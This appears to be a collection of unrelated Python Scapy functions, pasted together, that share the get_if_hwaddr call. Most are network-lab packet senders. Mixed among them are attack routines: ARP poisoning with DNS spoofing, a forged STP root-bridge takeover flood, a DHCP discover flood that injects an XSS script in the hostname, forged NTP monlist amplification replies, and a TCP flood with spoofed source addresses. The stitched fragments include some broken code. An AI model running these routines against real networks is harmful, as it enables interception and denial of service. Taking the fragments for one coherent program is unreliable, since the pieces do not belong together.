def main(): if len(sys.argv) < 4: print 'pass 2 arguments: <destination> "<message>" <packetType> <#packets>' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() print "Sending %s packets" % (sys.argv[3]) if sys.argv[3] == "tcp": pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP( dst=addr, options=IPOption_MRI(count=0, swtraces=[])) / TCP( dport=4321, sport=1234) / sys.argv[2] elif sys.argv[3] == "udp": pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP( dst=addr, options=IPOption_MRI(count=0, swtraces=[])) / UDP( dport=4321, sport=1234) / sys.argv[2] else: print "Unrecognized packet" pkt.show2() try: for i in range(int(sys.argv[4])): sendp(pkt, iface=iface) sleep(1) except KeyboardInterrupt: raise
def __parseCmdLine(self, cfg=None): ''' Parse whatever argparse has got. ''' errcode = 0 errmsg = '' if cfg == None: errcode = 1 errmsg = "[-] Unable to parse command line args." return (errcode, errmsg) # validate cmd line args if cfg.iface in get_if_list(): self.__iface = cfg.iface self.__ifaceOldMac = get_if_hwaddr(self.__iface) if cfg.mac is None: self.__ifaceMac = get_if_hwaddr(self.__iface) else: self.__ifaceMac = cfg.mac else: errcode = 2 errmsg = "[-] No such interface: " + cfg.iface return (errcode, errmsg) if cfg.threads > 0: self.__threads = cfg.threads else: errcode = 3 errmsg = "[-] A positive number of threads must be given." self.__vlanIds = self.__parseVlanIdString(cfg.vlanIds) if self.__vlanIds == []: errcode = 10 errmsg = "[-] vlan range string is invalid." return (errcode, errmsg) return (errcode, errmsg)
def main(): if len(sys.argv) < 3: print 'pass 1 arguments: <destination> ' exit(1) #dst addr addr = socket.gethostbyname(sys.argv[1]) #src addr addr1 = socket.gethostbyname(sys.argv[2]) iface = "veth0" iface_1 = "veth2" iface_2 = "veth4" out_ether = Ether(src=get_if_hwaddr(iface), dst='00:00:00:00:00:01', type=0x894f) in_ether = Ether(src=get_if_hwaddr(iface), dst='00:00:00:00:00:01', type=0x800) # pkt = Ether(dst='00:00:00:00:00:02') / pkt / IP(src=addr1,dst=addr) / "hi" pkt1 = out_ether / NSH() / in_ether / IP(src=addr1, dst=addr) / "hi" # pkt = pkt /IP(src=addr1,dst=addr) / TCP(dport=1234, sport=random.randint(49152,65535)) / "hi" # pkt.show2() pkt1.show() hexdump(pkt1) sendp(pkt1, iface=iface, verbose=False) print "sending on interface %s (Bmv2 port 0) to dmac=00:00:00:00:00:01" % ( iface)
def main(): if len(sys.argv) < 3: print 'pass 2 arguments: <destination> "<message>"' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP( dst=addr, options=IPOption_MRI(count=0, pathid=0, swtraces=[])) / UDP( dport=4321, sport=1234) / sys.argv[2] # pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP( # dst=addr, options = IPOption_MRI(count=2, # swtraces=[SwitchTrace(swid=0,qdepth=0), SwitchTrace(swid=1,qdepth=0)])) / UDP( # dport=4321, sport=1234) / sys.argv[2] #pkt2.show2() #hexdump(pkt) try: for i in range(int(sys.argv[3])): pkt2 = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP( dst=addr, options=IPOption_MRI( count=0, pathid=1, swtraces=[])) / UDP( dport=4321, sport=1234) / sys.argv[2] pkt2.show2() sendp(pkt2, iface=iface) #sleep(1) except KeyboardInterrupt: raise
def aliveThread(self): while True: time.sleep(5) self.lock_alive.acquire() if (self.leader_alive == 1): pkt = Ether(src=get_if_hwaddr(self.iface), dst='ff:ff:ff:ff:ff:ff', type=TYPE_GVT) pkt = pkt / GvtProtocol( flag=TYPE_FAILURE, value=0, pid=self.pid) sendp(pkt, iface=self.iface, verbose=False) #this is a PING! leader alive? self.leader_alive = 0 #print "ping" else: #trigger recovery... self.change_interface() self.leader_alive = 1 #necessario para nao entrar nessa condicao logo que o novo leader e escolhido #envia pacote de start changeS pkt = Ether(src=get_if_hwaddr(self.iface), dst='ff:ff:ff:ff:ff:ff', type=TYPE_GVT) pkt = pkt / GvtProtocol( flag=TYPE_VIEWCHANGE, value=0, pid=self.pid) sendp(pkt, iface=self.iface, verbose=False) self.lock_alive.release()
def main(): parser = argparse.ArgumentParser() parser.add_argument('ip_addr', type=str, help="The destination IP address to use") parser.add_argument('message', type=str, help="The message to include in packet") parser.add_argument( '--dst_id', type=int, default=None, help= 'The myTunnel dst_id to use, if unspecified then myTunnel header will not be included in packet' ) args = parser.parse_args() addr = socket.gethostbyname(args.ip_addr) dst_id = args.dst_id iface = get_if() if (dst_id is not None): print "sending on interface {} to dst_id {}".format(iface, str(dst_id)) pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') pkt = pkt / MyTunnel(dst_id=dst_id) / IP(dst=addr) / args.message else: print "sending on interface {} to IP addr {}".format(iface, str(addr)) pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') pkt = pkt / IP(dst=addr) / TCP( dport=1234, sport=random.randint(49152, 65535)) / args.message pkt.show2() # hexdump(pkt) # print "len(pkt) = ", len(pkt) sendp(pkt, iface=iface, verbose=False)
def __parseCmdLine(self, cfg = None): ''' Parse whatever argparse has got. ''' errcode = 0 errmsg = '' if cfg == None: errcode = 1 errmsg = "[-] Unable to parse command line args." return (errcode, errmsg) # validate cmd line args if cfg.iface in get_if_list(): self.__iface = cfg.iface self.__ifaceOldMac = get_if_hwaddr(self.__iface) if cfg.mac is None: self.__ifaceMac = get_if_hwaddr(self.__iface) else: self.__ifaceMac = cfg.mac else: errcode = 2 errmsg = "[-] No such interface: " + cfg.iface return (errcode, errmsg) if cfg.threads > 0: self.__threads = cfg.threads else: errcode = 3 errmsg = "[-] A positive number of threads must be given." self.__vlanIds = self.__parseVlanIdString(cfg.vlanIds) if self.__vlanIds == []: errcode = 10 errmsg = "[-] vlan range string is invalid." return (errcode, errmsg) return (errcode, errmsg)
def main(): parser = argparse.ArgumentParser() parser.add_argument("--p", help="Protocol name To send TCP/UDP etc packets", type=str) parser.add_argument("--des", help="IP address of the destination", type=str) parser.add_argument("--m", help="Raw Message", type=str) parser.add_argument("--dur", help="in seconds", type=str) args = parser.parse_args() if args.p and args.des and args.m and args.dur: addr = socket.gethostbyname(args.des) iface = get_if() if args.p == 'UDP': pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP(dst=addr, tos=1) / UDP(dport=4321, sport=1234) / args.m pkt.show2() try: for i in range(int(args.dur)): sendp(pkt, iface=iface) sleep(1) except KeyboardInterrupt: raise elif args.p == 'TCP': pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP(dst=addr, tos=1) / TCP() / args.m pkt.show2() try: for i in range(int(args.dur)): sendp(pkt, iface=iface) sleep(1) except KeyboardInterrupt: raise
def send_Custom_pkt(): global dq1 addr = socket.gethostbyname(sys.argv[1]) iface = get_if() while(1): if len(dq1) > 0: currtid = dq1.popleft() pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') /IP(dst=addr) / UDP(dport=4321, sport=1234) / tenant(id=currtid) / sys.argv[2] #pkt.show2() sendp(pkt, iface=iface, verbose=False) if len(dq2) > 0: currtid = dq2.popleft() pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') /IP(dst=addr) / UDP(dport=4321, sport=1234) / tenant(id=currtid) / sys.argv[2] #pkt.show2() sendp(pkt, iface=iface, verbose=False) if len(dq3) > 0: currtid = dq3.popleft() pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') /IP(dst=addr) / UDP(dport=4321, sport=1234) / tenant(id=currtid) / sys.argv[2] #pkt.show2() sendp(pkt, iface=iface, verbose=False) print "len dq1 {} dq2 {} dq3 {} ".format(len(dq1), len(dq2), len(dq3)) print "len wd1 {} wd2 {} wd3 {} ".format(dq1_wnd, dq2_wnd, dq3_wnd)
def send_packet(pkt_ip, cnt=1, ipVer=8, iface=None): """send packet through eth0 or 1st available interfaces""" if iface is None: ifs = get_if_list() for i in ifs: if "eth0" in i: iface = i break if not iface: # tmp test iface = 'lo' if ipVer == 8: pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff', type=0x888) elif ipVer == 6: pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff', type=0x86DD) else: print("IP version {} is not supported. Abort Early".format(inVer)) exit(1) pkt = pkt / pkt_ip pkt.show() hexdump(pkt) t0 = time.time() sendp(pkt, iface=iface, count=cnt, inter=0.001, verbose=True) t_span = time.time() - t0 print("send {} IPv{} packts use {} sec".format(cnt, ipVer, t_span)) return iface
def send_packet(context, srcaddr=None, hlim=None, valid=3600, pref=1800): from scapy.all import get_if_hwaddr from scapy.all import sendp, Ether, IPv6 from scapy.all import ICMPv6ND_RA from scapy.all import ICMPv6NDOptPrefixInfo in_if = "test10" out_if = "test11" p = Ether(dst=get_if_hwaddr(out_if), src=get_if_hwaddr(in_if)) if srcaddr or hlim: if hlim: p /= IPv6(dst="ff02::1", hlim=int(hlim)) else: p /= IPv6(dst="ff02::1", src=srcaddr) else: p /= IPv6(dst="ff02::1") valid, pref = int(valid), int(pref) p /= ICMPv6ND_RA() p /= ICMPv6NDOptPrefixInfo(prefix="fd00:8086:1337::", prefixlen=64, validlifetime=valid, preferredlifetime=pref) sendp(p, iface=in_if) sendp(p, iface=in_if) sleep(3)
def main(): parser = argparse.ArgumentParser() parser.add_argument('ip_addr', type=str, help="The destination IP address to use") parser.add_argument('message', type=str, help="The message to include in packet") parser.add_argument('country_id', type=str, help="The destination country address to use") parser.add_argument('state_id', type=str, help="The destination state address to use") parser.add_argument('city_id', type=str, help="The destination city address to use") parser.add_argument('as_num', type=str, help="The destination AS address to use") #parser.add_argument('--dst_id', type=int, default=None, help='The myTunnel dst_id to use, if unspecified then myTunnel header will not be included in packet') args = parser.parse_args() addr = socket.gethostbyname(args.ip_addr) arg0 = args.country_id arg1 = args.state_id arg2 = args.city_id arg3 = args.as_num iface = get_if() if (arg0 is not None): print "sending on interface {} to country_id {}".format(iface, arg0) pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') pkt = pkt / MyHeader(country_id = arg0 , state_id =arg1 , city_id = arg2 , as_num = arg3) / IP(dst=addr) / args.message else: print "sending on interface {} to IP addr {}".format(iface, str(addr)) pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') pkt = pkt / IP(dst=addr) / TCP(dport=1234, sport=random.randint(49152,65535)) / args.message #pkt.show2() # hexdump(pkt) # print "len(pkt) = ", len(pkt) sendp(pkt, iface=iface, verbose=False)
def main(): if len(sys.argv) < 3: print 'pass 1 arguments: <destination> ' exit(1) #src addr addr = socket.gethostbyname(sys.argv[1]) #dst addr addr1 = socket.gethostbyname(sys.argv[2]) iface = sys.argv[3] out_ether = Ether(src=get_if_hwaddr(iface), dst='00:00:00:00:00:01', type=0x894f) in_ether = Ether(src=get_if_hwaddr(iface), dst='00:00:00:00:00:01', type=0x800) pkt1 = out_ether / NSH() / in_ether / IP(src=addr, dst=addr1) / TCP( dport=80, sport=20) / "hi" pkt1.show() hexdump(pkt1) sendp(pkt1, iface=iface, verbose=False) print "sending on interface %s (Bmv2 port 0) to dmac=00:00:00:00:00:01" % ( iface)
def main(): parser = argparse.ArgumentParser(description="Scapy sender program template") parser.add_argument('-v', type=int, help="Specify using (4)IPv4/(6)IPv6.", default=4) parser.add_argument('--intf', type=str, help="Specify interface.", default="eth0") parser.add_argument('--dip', type=str, help="The destination IP address.", default="255.255.255.255") parser.add_argument('--l4', type=str, help="Specify using TCP or UDP.", default="tcp") # parser.add_argument('--loop', type=int, help="Number of loop.", default=0) # parser.add_argument('--msg', type=str, help="The message which will send to dst.",default="Hello World") parser.add_argument('--dport', type=int, help="TCP/UDP destination port.", default=1234) parser.add_argument('--sport', type=int, help="TCP/UDP source port.", default=random.randint(49152,65535)) # parse args = parser.parse_args() # parser.print_help() # get value from args ipv = args.v addr = socket.gethostbyname(args.dip) iface = args.intf #get_if() dip = args.dip l4flag = args.l4 dport = args.dport sport = args.sport # print all print("IP version: IPv", ipv) print("Destination IP address: ", dip) print("Interface: ", iface) print("Layer 4: ", l4flag) print("Desintation Port number: ", dport) print("Source Port number: ", sport) # start to pack if ipv is 4: print "sending on interface {} to IP addr {}".format(iface, str(addr)) # for x in range(0, args.loop): pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') if l4flag is 'tcp': pkt = pkt / IP(dst=addr) / TCP(dport=dport, sport=sport) / "Scapy Template" else: pkt = pkt / IP(dst=addr) / UDP(dport=dport, sport=sport) / "Scapy Template" # show pkt.show2() # send sendp(pkt, iface=iface, verbose=True) # sleep time.sleep(1) elif ipv is 6: print "sending on interface {} to IPv6 addr {}".format(iface, str(addr)) #for x in range(0, args.loop): pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') pkt = pkt / IPv6(dst=addr) / TCP(dport=dport, sport=sport) / "Scapy Template" # show pkt.show2() # send sendp(pkt, iface=iface, verbose=False)
def Start_Attack(self): self.targets, self.domains = {}, [] if self.myListDns.count() != 0: for index in xrange(self.myListDns.count()): self.domains.append(str(self.myListDns.item(index).text())) for i in self.domains: self.targets[i] = '' self.myDNsoutput.clear() if not self.configure.Settings.get_setting( 'accesspoint', 'statusAP', format=bool): if (len(self.txt_target.text()) and len(self.txt_gateway.text())) == 0: return QtGui.QMessageBox.warning( self, 'Error Dnsspoof', 'you need set the input correctly') if (len(self.txt_target.text()) and len(self.txt_gateway.text()) ) and len(self.txt_redirect.text()) != 0: Refactor.set_ip_forward(1) arp_gateway = ThARP_posion( str(self.txt_target.text()), str(self.txt_gateway.text()), get_if_hwaddr(str(self.ComboIface.currentText()))) arp_gateway.setObjectName('Arp Posion:: [gateway]') threadloading['arps'].append(arp_gateway) arp_gateway.start() arp_target = ThARP_posion( str(self.txt_gateway.text()), str(self.txt_target.text()), get_if_hwaddr(str(self.ComboIface.currentText()))) arp_target.setObjectName('Arp Posion:: [target]') threadloading['arps'].append(arp_target) arp_target.start() self.thr = ThSpoofAttack(self.targets, str(self.ComboIface.currentText()), 'udp port 53', True, str(self.txt_redirect.text())) else: self.thr = ThreadDNSspoofNF(self.targets, str(self.ComboIface.currentText()), str(self.txt_redirect.text()), APmode=True) self.thr.DnsReq.connect(self.get_outputDNSspoof) self.connect(self.thr, QtCore.SIGNAL('Activated ( PyQt_PyObject ) '), self.StopArpAttack) self.thr.setObjectName('Dns Spoof') self.ThreadDirc['dns_spoof'].append(self.thr) self.StatusMonitor(True, 'dns_spoof') self.btn_Attack_Posion.setEnabled(False) self.btn_Stop_Posion.setEnabled(True) self.thr.start()
def run(interface): pkt = sniff(stop_filter=lambda x: x.haslayer(STP), iface=interface) pk_list={x:y for x,y in pkt.sessions().iteritems() if "Other" in x} item=pk_list.popitem() pkts = item[1] for x in pkts: if STP in x: STP_packet = x break myMAC = get_if_hwaddr(interface) root_id = STP_packet.rootid - 1 bridge_id = STP_packet.bridgeid - 1 p_ether = Dot3(dst="01:80:c2:00:00:00", src=myMAC) p_llc = LLC() p_stp = STP(bpdutype=0x00, bpduflags=0x01, portid=0x8002, rootmac=myMAC, bridgemac=myMAC, rootid=root_id, bridgeid=bridge_id) pkt = p_ether/p_llc/p_stp try: while 1: sendp(pkt, iface=interface, verbose=0) except KeyboardInterrupt: pass
def main(): if len(sys.argv) < 3: print 'pass 2 arguments: <destination> "<message>"' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() if len(sys.argv) > 3: tos = int(sys.argv[3]) % 256 else: tos = 0 ether_dst = get_dst_mac(addr) if not ether_dst: print "Mac address for %s was not found in the ARP table" % addr exit(1) print "Sending on interface %s to %s" % (iface, str(addr)) pkt = Ether(src=get_if_hwaddr(iface), dst=ether_dst) pkt = pkt / IP(dst=addr, tos=tos) / TCP(sport=10, dport=20, flags="F", seq=3, ack=10, options=[ ("NOP", None), ("NOP", None), ('Timestamp', (0x89abcdef, 0x45670004)), ]) / sys.argv[2] sendp(pkt, iface=iface, verbose=False)
def main(): if len(sys.argv) < 3: print 'pass 2 arguments: <destination> "<message>"' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() #hexdump(pkt) try: for i in range(int(sys.argv[3])): w = random.randint(1, 250) x = random.randint(1, 250) y = random.randint(1, 250) z = random.randint(1, 250) pkt = pkt = Ether( src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') / IP( src='{}.{}.{}.{}'.format(w, x, y, z), dst=addr) / TCP( dport=1234, sport=random.randint(49152, 65535)) / sys.argv[2] sendp(pkt, iface=iface) sleep(0.01) except KeyboardInterrupt: raise
def send_Custom_pkt(id_t): addr = socket.gethostbyname(sys.argv[1]) iface = get_if() pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') / IP( dst=addr) / UDP(dport=4321, sport=1234) / tenant(id=id_t) / sys.argv[2] pkt.show2() sendp(pkt, iface=iface, verbose=False)
def __init__(self, iface="eth0", wireless=False, DEBUG=False, log=False): self.iface = iface self.mac = get_if_hwaddr(self.iface) try: self.pub_ip = gu.get_pub_ip() except: print "Not connected to the internet.." # I still don't see it as much of a problem try: self.gateway = gu.get_default_gateway() except: raise Exception("noDefGateway") self.poison_pid = 0 self.router_mac = getmacbyip(self.gateway) self.wireless = wireless # currently this flag needs to be set manually (during obj init or obj.wireless = True) self.debug = DEBUG # un-shutthefuckups scapy and prints internal values self.log = log if self.debug: print self.iface print self.mac print self.gateway print self.router_mac print self.wireless conf.verb = 3 if self.log: with open("/var/log/fun&games.log", "a") as f: f.write("Started a session on ip: " + self.pub_ip + " at " + str(datetime.now()) + "\n")
def Start_Attack(self): if (len(self.txt_target.text()) and len(self.txt_mac.text()) and len(self.txt_gateway.text())) == 0: QMessageBox.information(self, 'Error Arp Attacker', 'you need set the input correctly') else: chdir(self.owd) if (len(self.txt_target.text()) and len(self.txt_gateway.text())) and len(self.txt_mac.text()) != 0: if len(self.txt_redirect.text()) != 0: self.StatusMonitor(True,'stas_arp') Refactor.set_ip_forward(1) arp_gateway = ThARP_posion(str(self.txt_gateway.text()),str(self.txt_target.text()), get_if_hwaddr(str(self.ComboIface.currentText()))) arp_gateway.setObjectName('Arp Poison:: [gateway]') self.ThreadDirc['Arp_posion'].append(arp_gateway) arp_gateway.start() arp_target = ThARP_posion(str(self.txt_target.text()),str(self.txt_gateway.text()), str(self.txt_mac.text())) self.connect(arp_target,SIGNAL('Activated ( QString ) '), self.StopArpAttack) arp_target.setObjectName('Arp::Poison => [target]') self.ThreadDirc['Arp_posion'].append(arp_target) arp_target.start() redirectPackets = ThSpoofAttack('', str(self.ComboIface.currentText()),'udp port 53',True,str(self.txt_redirect.text())) self.connect(redirectPackets,SIGNAL('Activated ( QString ) '), self.StopArpAttack) redirectPackets.setObjectName('Packets Spoof') self.ThreadDirc['Arp_posion'].append(redirectPackets) redirectPackets.start() return QMessageBox.information(self,'Error Redirect IP','Redirect IP is not found')
def main(): if len(sys.argv)<2: print 'pass 2 arguments: <destination>' exit(1) #addr = socket.gethostbyname(sys.argv[1]) iface = get_if() print "sending on interface %s to %s" % (iface, sys.argv[1]) while True: print s = str(raw_input('Type space separated port nums ' '(example: "4 3 1 2 2 ") or "q" to quit: ')) if s == "q": break; print pkt = Ether(src=get_if_hwaddr(iface), dst='00:aa:00:00:00:01') pkt = pkt / IPv6(dst=sys.argv[1], nh=150) / MRI(count=0, swtraces=[]) #pkt = pkt / SwitchTrace(swid=0, in_port=0, out_port=0, qdepth=0, in_time=0, out_time=0, bos=0) #pkt = pkt / SwitchTrace(swid=0, in_port=0, out_port=0, qdepth=0, in_time=0, out_time=0, bos=0) #pkt = pkt / UDP(dport=4321, sport=1234) / "P4 is cool" pkt.show2() for i in range(int(sys.argv[2])): sendp(pkt, iface=iface, verbose=False) sleep(1)
def __init__(self, label, iface, logger, promisc=True): """ Initialize member variables. Args: label (str): Human-readable label for this interface. iface (str): ScaPy interface-ID string. (See list_eth_interfaces.) logger (Logger): Logger object (logging.Logger) for reporting errors. promisc (bool): Enable promiscuous mode? (Default True) May require admin/root privileges. """ self._iface = sca.conf.L2socket(iface, promisc=promisc) self.lbl = label self.mac = str2mac(sca.get_if_hwaddr(iface)) self._callback = None self._log = logger self._rx_run = True # Reduce ScaPy verbosity (default is rather high). sca.conf.verb = 0 # Create and start the worker thread. self._rx_thread = threading.Thread(target=self._rx_loop, name='Ethernet receive') self._rx_thread.setDaemon(True) self._rx_thread.start()
def getMAC(interface): try: mac_address = get_if_hwaddr(interface) return mac_address except Exception, e: shutdown("[Utils] Error retrieving MAC address from {}: {}".format( interface, e))
def main(): if len(sys.argv) < 4: print 'pass 3 arguments: <op> <keyhash> "<message>" (node)' exit(1) op = int(sys.argv[1]) keyhash = int(sys.argv[2]) msg = sys.argv[3] if len(sys.argv) > 4: node = int(sys.argv[4]) else: node = 0 iface = get_if() if op == OP_REP: dst_ip = client_ip dst_mac = client_mac else: dst_ip = server_ip dst_mac = server_mac print "sending on interface %s to %s" % (iface, str(dst_ip)) pkt = Ether(src=get_if_hwaddr(iface), dst=dst_mac) pkt = pkt / IP(dst=dst_ip) / UDP( dport=12345, sport=random.randint(49152, 65535)) / Pegasus( op=op, keyhash=keyhash, node=node) / msg pkt.show2() sendp(pkt, iface=iface, verbose=False)
def main(): if len(sys.argv) < 3: print 'pass 3 arguments: <destination> <num>' exit(1) addr = socket.gethostbyname(sys.argv[1]) num = int(sys.argv[2]) iface = get_if() print "sending on interface %s to %s" % (iface, str(addr)) while num > 0: num = num - 1 s = "2 2 1" i = 0 pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') for p in s.split(" "): try: pkt = pkt / SourceRoute(bos=0, port=int(p)) i = i + 1 except ValueError: pass if pkt.haslayer(SourceRoute): pkt.getlayer(SourceRoute, i).bos = 1 pkt = pkt / IP( dst=addr, options=IPOption_MRI( count=0, pathid=1, swtraces=[])) / UDP(dport=4321, sport=1234) pkt.show2() sendp(pkt, iface=iface, verbose=False)
def main(): if len(sys.argv)<2: print 'pass 2 arguments: <destination>' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() print "sending on interface %s to %s" % (iface, str(addr)) while True: print s = str(raw_input('Type space separated port nums ' '(example: "2 3 2 2 1") or "q" to quit: ')) if s == "q": break; print i = 0 pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff'); for p in s.split(" "): try: pkt = pkt / SourceRoute(bos=0, port=int(p)) i = i+1 except ValueError: pass if pkt.haslayer(SourceRoute): pkt.getlayer(SourceRoute, i).bos = 1 pkt = pkt / IP(dst=addr) / UDP(dport=4321, sport=1234) pkt.show2() sendp(pkt, iface=iface, verbose=False)
def __init__(self, **config_params): """Initialize the class with the required network and packet params. Args: config_params: contains all the necessary packet parameters. Some fields can be generated automatically. For example: {'subnet_mask': '255.255.255.0', 'dst_ipv4': '192.168.1.3', 'src_ipv4: 'get_local', ... The key can also be 'get_local' which means the code will read and use the local interface parameters """ interf = config_params['interf'] self.packet = None self.dst_mac = config_params['dst_mac'] if config_params['src_mac'] == GET_FROM_LOCAL_INTERFACE: self.src_mac = scapy.get_if_hwaddr(interf) else: self.src_mac = config_params['src_mac'] self.dst_ipv4 = config_params['dst_ipv4'] if config_params['src_ipv4'] == GET_FROM_LOCAL_INTERFACE: self.src_ipv4 = scapy.get_if_addr(interf) else: self.src_ipv4 = config_params['src_ipv4']
def main(): if len(sys.argv) < 3: print 'pass 2 arguments: <destination> "<message>"' exit(1) # pkt.show2() # If exist sys.argv[3], treat it as number of sending packets try: if (sys.argv[3] != None): for i in range(int(sys.argv[3])): # each sending packet need to reset addr = socket.gethostbyname(sys.argv[1]) iface = get_if() print "sending on interface %s to %s" % (iface, str(addr)) pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') pkt = pkt / IP(dst=addr) / TCP(dport=1234, sport=random.randint( 49152, 65535)) / sys.argv[2] sendp(pkt, iface=iface) sleep(1) except KeyboardInterrupt: raise
def send_carrier(length): iface= get_if() pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff', type=0x1234); pkt = pkt/CARRIER(length=length) sendp(pkt, iface=iface, verbose=False)
def get_mac(interface): try: mac_address = get_if_hwaddr(interface) return mac_address except Exception as e: shutdown("Error retrieving MAC address from {0}: {1}".format( interface, e))
def handle_pkt(pkt, iface): my_mac = get_if_hwaddr(iface) my_ip = get_ip_address(iface) NTP_ITEMS = "\x06" NTP_ITEMS_INT = 6 NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" + NTP_ITEMS + "\x00\x48" + "\x00" * 72 * NTP_ITEMS_INT if UDP in pkt and IP in pkt and pkt[IP].src != my_ip: src_mac = my_mac dst_mac = pkt[Ether].dst src_ip = my_ip dst_ip = pkt[IP].dst proto = pkt[IP].proto sport = pkt[UDP].sport dport = pkt[UDP].dport # Respond with 10 packages with 6 items each = 60 items * 72 bytes = 4320 data bytes p = Ether(dst=my_mac, src=dst_mac) / IP(dst=pkt[IP].src, src=my_ip) p = p / UDP(dport=123, sport=123) / Raw(NTP_MONLIST_RESPONSE) sendp(p, iface=iface, loop=0, verbose=0) sendp(p, iface=iface, loop=0, verbose=0) sendp(p, iface=iface, loop=0, verbose=0) sendp(p, iface=iface, loop=0, verbose=0) sendp(p, iface=iface, loop=0, verbose=0) sendp(p, iface=iface, loop=0, verbose=0) sendp(p, iface=iface, loop=0, verbose=0) sendp(p, iface=iface, loop=0, verbose=0) sendp(p, iface=iface, loop=0, verbose=0) sendp(p, iface=iface, loop=0, verbose=0)
def create_mac_filter(iface): '''tcpdump can not cactch all 6 octets so it is splitted. See http://blog.jasonantman.com/2010/04/dhcp-debugging-and-handy-tcpdump-filters # noqa ''' mac = scapy.get_if_hwaddr(iface).split(':') filter1 = '(udp[36:2] = 0x{0})'.format(''.join(mac[:2])) filter2 = '(udp[38:4] = 0x{0})'.format(''.join(mac[2:])) return '{0} and {1}'.format(filter1, filter2)
def main(): if len(sys.argv)<3: print 'pass 2 arguments: <destination> "<message>"' exit(1) addr = socket.gethostbyname(sys.argv[1]) iface = get_if() print "sending on interface %s to %s" % (iface, str(addr)) pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') / IP(dst=addr) / UDP(dport=4321, sport=1234) / sys.argv[2] pkt.show2() sendp(pkt, iface=iface, verbose=False)
def get_pc_info(self): self.PC = {} for r in conf.route.routes: if("0.0.0.0" not in r[2]): ba = r[2].split(".") self.PC["BASE"] = ba[0]+"."+ba[1]+"."+ba[2]+"." self.PC["IP"] = r[4] self.PC["MAC"] = get_if_hwaddr(r[3]) self.PC["IFACE"] = r[3]; if(self.PC["BASE"]=="") or (self.PC["IP"]=="") or (self.PC["MAC"]=="") or (self.PC["IFACE"]==""): dialog = Gtk.MessageDialog(None, 0, Gtk.MessageType.ERROR, Gtk.ButtonsType.OK, "Error") dialog.format_secondary_text("Cannot find iface, gateway, IP or MAC.") dialog.run() dialog.destroy() exit(1)
def run(interface,xs): """ This function launch DHCP DISCOVER DOS attack :param inter: interface to be launched the attack :type inter: str """ global src_mac global xi global follow global inter follow=False #if len(interface) > 0: inter = interface if xs == "": xss="<script>alert('hola')</script>" else: xss=xs try: src_mac= get_if_hwaddr(inter) print str(src_mac) ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=str(src_mac), type=0x800) ip = IP(src="0.0.0.0", dst="255.255.255.255") udp = UDP(sport=68, dport=67) while not follow: xi = RandString(8, "1234567890abcdef") xi = "0x"+str(xi) res = src_mac.split(":") ch="" for i in res: ch=ch + chr(int(i,16)) bootps = BOOTP(xid=int(xi,16), ciaddr='0.0.0.0',chaddr=ch) host = "<script>alert('hola')</script>" dhcps = DHCP(options=[("message-type", "discover"),("hostname",host), "end"]) packet = ethernet / ip / udp / bootps / dhcps conf.checkIPaddr = False pkt=srp1(packet, iface=inter, verbose=1) if BOOTP in pkt: is_DHCP(pkt) #sniff(prn=is_DHCP, filter="udp and (port 67 or 68)", iface=inter except KeyboardInterrupt: pass
def send_random_traffic(dst): dst_mac = None dst_ip = None src_mac = [get_if_hwaddr(i) for i in get_if_list() if i == 'eth0'] if len(src_mac) < 1: print ("No interface for output") sys.exit(1) src_mac = src_mac[0] src_ip = None if src_mac =="00:00:00:00:00:01": src_ip = "10.0.0.1" elif src_mac =="00:00:00:00:00:02": src_ip = "10.0.0.2" elif src_mac =="00:00:00:00:00:03": src_ip = "10.0.0.3" else: print ("Invalid source host") sys.exit(1) if dst == 'h1': dst_mac = "00:00:00:00:00:01" dst_ip = "10.0.0.1" elif dst == 'h2': dst_mac = "00:00:00:00:00:02" dst_ip = "10.0.0.2" elif dst == 'h3': dst_mac = "00:00:00:00:00:03" dst_ip = "10.0.0.3" else: print ("Invalid host to send to") sys.exit(1) total_pkts = 0 random_ports = random.sample(xrange(1024, 65535), 10) for port in random_ports: num_packets = random.randint(50, 250) for i in range(num_packets): data = randomword(100) p = Ether(dst=dst_mac,src=src_mac)/IP(dst=dst_ip,src=src_ip) p = p/TCP(dport=port)/Raw(load=data) print p.show() sendp(p, iface = "eth0") total_pkts += 1 print "Sent %s packets in total" % total_pkts
